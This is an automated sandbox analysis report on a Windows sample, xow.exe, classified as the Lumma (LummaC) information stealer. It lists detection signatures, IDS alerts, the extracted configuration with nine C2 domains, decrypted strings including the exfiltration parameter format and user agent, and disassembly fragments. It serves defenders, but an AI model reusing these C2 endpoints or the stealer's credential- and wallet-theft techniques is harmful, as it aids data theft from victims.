Edit tour

Windows Analysis Report
xow.exe

Overview

General Information

Sample name:	xow.exe
Analysis ID:	1596726
MD5:	319c0c96d2317eadf4271f5149edea3a
SHA1:	a913b78394bd26fbc7916ebe960bfd61e8d5d7b9
SHA256:	c0f74200267a768eb6f8a392a708c9cede9062e0e9d4391040ae94b495450d0d
Tags:	exeuser-marsomx
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

xow.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\xow.exe" MD5: 319C0C96D2317EADF4271F5149EDEA3A)

xow.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\xow.exe" MD5: 319C0C96D2317EADF4271F5149EDEA3A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["pain-temper.bond", "crookedfoshe.bond", "stripedre-lot.bond", "immolatechallen.bond", "jarry-fixxer.bond", "longingfluffyr.cyou", "strivehelpeu.bond", "growthselec.bond", "jarry-deatile.bond"], "Build id": "c2CoW0--RIII"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1734036576.0000000006300000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: xow.exe PID: 7348	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: xow.exe PID: 7348	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: xow.exe PID: 7392	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.xow.exe.6300000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.xow.exe.6300000.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.930909+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:03.519161+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:05.451992+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.78.5	443	TCP
2025-01-22T12:24:14.917837+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.78.5	443	TCP
2025-01-22T12:24:16.563940+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.78.5	443	TCP
2025-01-22T12:24:18.778898+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.78.5	443	TCP
2025-01-22T12:24:21.106698+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.78.5	443	TCP
2025-01-22T12:24:23.479506+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.78.5	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:02.893451+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:04.494734+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:23.998870+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49744	104.21.78.5	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:02.893451+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.78.5	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:04.494734+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	104.21.78.5	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.930909+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:03.519161+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:05.451992+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.78.5	443	TCP
2025-01-22T12:24:14.917837+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.78.5	443	TCP
2025-01-22T12:24:16.563940+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.78.5	443	TCP
2025-01-22T12:24:18.778898+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.21.78.5	443	TCP
2025-01-22T12:24:21.106698+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	104.21.78.5	443	TCP
2025-01-22T12:24:23.479506+0100	2059230	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	104.21.78.5	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crookedfoshe .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.174972+0100	2059219	1	Domain Observed Used for C2 Detected	192.168.2.4	55507	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (growthselec .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.212260+0100	2059223	1	Domain Observed Used for C2 Detected	192.168.2.4	54397	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immolatechallen .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.187409+0100	2059225	1	Domain Observed Used for C2 Detected	192.168.2.4	51568	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (jarry-deatile .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.222829+0100	2059227	1	Domain Observed Used for C2 Detected	192.168.2.4	58897	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (jarry-fixxer .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.250344+0100	2059229	1	Domain Observed Used for C2 Detected	192.168.2.4	65226	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pain-temper .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.238349+0100	2059233	1	Domain Observed Used for C2 Detected	192.168.2.4	58618	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stripedre-lot .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.200231+0100	2059237	1	Domain Observed Used for C2 Detected	192.168.2.4	50141	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strivehelpeu .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:01.162265+0100	2059239	1	Domain Observed Used for C2 Detected	192.168.2.4	53887	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T12:24:14.411812+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.78.5	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://jarry-fixxer.bond:443/api	Avira URL Cloud: Label: malware
Source: https://growthselec.bond:443/api	Avira URL Cloud: Label: phishing
Source: https://jarry-fixxer.bond/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.xow.exe.360000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["pain-temper.bond", "crookedfoshe.bond", "stripedre-lot.bond", "immolatechallen.bond", "jarry-fixxer.bond", "longingfluffyr.cyou", "strivehelpeu.bond", "growthselec.bond", "jarry-deatile.bond"], "Build id": "c2CoW0--RIII"}

Multi AV Scanner detection for submitted file

Source: xow.exe	Virustotal: Detection: 32%			Perma Link
Source: xow.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: xow.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-fixxer.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pain-temper.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-deatile.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: growthselec.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stripedre-lot.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immolatechallen.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crookedfoshe.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: strivehelpeu.bond
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: longingfluffyr.cyou
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1710337843.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String decryptor: c2CoW0--RIII

Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003751B0 CryptUnprotectData,		1_2_003751B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003751B0 CryptUnprotectData,		1_2_003751B0

Source: xow.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: xow.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: xow.exe, 00000000.00000002.1728368665.0000000003D3D000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734839973.00000000064F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: xow.exe, 00000000.00000002.1728368665.0000000003D3D000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734839973.00000000064F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_063ED840
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then jmp 06579D40h	0_2_06579C80
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then jmp 06579D40h	0_2_06579C88
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	1_2_003A0810
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h	1_2_003A0810
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ecx, edx	1_2_003751B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	1_2_0036D9D4
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh	1_2_00399BC0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h]	1_2_00399D10
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+3CBACE16h]	1_2_00369585
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then xor byte ptr [edi+edx], dl	1_2_0036C5C1
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0038E6E0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+1Ch]	1_2_00385810
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_00376819
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, esi	1_2_00378074
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ecx, eax	1_2_0038A840
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+13h]	1_2_0036A8B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov eax, edx	1_2_0038D8BE
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then sub ebp, 01h	1_2_003610AA
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0037C090
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov word ptr [ebx], ax	1_2_00387890
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov eax, edx	1_2_0038D891
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, ecx	1_2_0038F0FA
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0038F0FA
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2DB32252h]	1_2_003768E1
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then not eax	1_2_003768E1
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov eax, edx	1_2_0038D84E
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, ecx	1_2_0038F1BF
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0038F1BF
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-6657724Dh]	1_2_0038E9B2
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, ecx	1_2_0038F181
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0038F181
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, ecx	1_2_0038F1CD
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0038F1CD
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov dword ptr [esp+08h], eax	1_2_0039B223
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, ebx	1_2_0037CA70
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000F0h]	1_2_0037827D
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], BFC89635h	1_2_0037827D
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+10FD35AFh]	1_2_00389A60
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then lea esi, dword ptr [esp+000000F2h]	1_2_00377A84
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0038EA8C
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+7F58515Ch]	1_2_0038D280
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov byte ptr [ebx], dl	1_2_0038D280
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ecx, edx	1_2_003751B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0038B320
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax]	1_2_00385B7B
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_00367370
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_00367370
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_00362B60
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h]	1_2_0039E384
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov dword ptr [esp+08h], esi	1_2_0037ABEF
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then lea eax, dword ptr [ebp-01h]	1_2_0039FBE0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp al, 5Ch	1_2_00362420
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	1_2_0037EC00
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+3CBACE16h]	1_2_00369440
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	1_2_003A04A0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov dword ptr [esp+08h], esi	1_2_0037ABEF
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_003794D0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ecx, dword ptr [003A9444h]	1_2_00376D22
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then lea esi, dword ptr [esp+000000F2h]	1_2_00377A84
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00397550
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then push 00000000h	1_2_0036AD40
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then push dword ptr [esi+10h]	1_2_0036AD40
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-5D9A6F40h]	1_2_0037C5A1
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ecx, ebx	1_2_0039FDA0
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h]	1_2_0039EE3A
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, dword ptr [esp+4Ch]	1_2_0037CE30
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov edx, dword ptr [esp+4Ch]	1_2_0037CE39
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+7D2E64A5h]	1_2_0037CE39
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	1_2_0039D620
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_0039DE10
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch]	1_2_00386600
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	1_2_0037EE70
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_00378F18
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then mov ebx, edx	1_2_0039F785
Source: C:\Users\user\Desktop\xow.exe	Code function: 4x nop then call 00399650h	1_2_0036DFD7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059239 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strivehelpeu .bond) : 192.168.2.4:53887 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059223 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (growthselec .bond) : 192.168.2.4:54397 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059237 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stripedre-lot .bond) : 192.168.2.4:50141 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059229 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (jarry-fixxer .bond) : 192.168.2.4:65226 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49735 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49731 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49733 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49737 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059219 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crookedfoshe .bond) : 192.168.2.4:55507 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059225 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immolatechallen .bond) : 192.168.2.4:51568 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059233 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pain-temper .bond) : 192.168.2.4:58618 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49734 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059227 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (jarry-deatile .bond) : 192.168.2.4:58897 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49732 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49742 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2059230 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI) : 192.168.2.4:49744 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.78.5:443
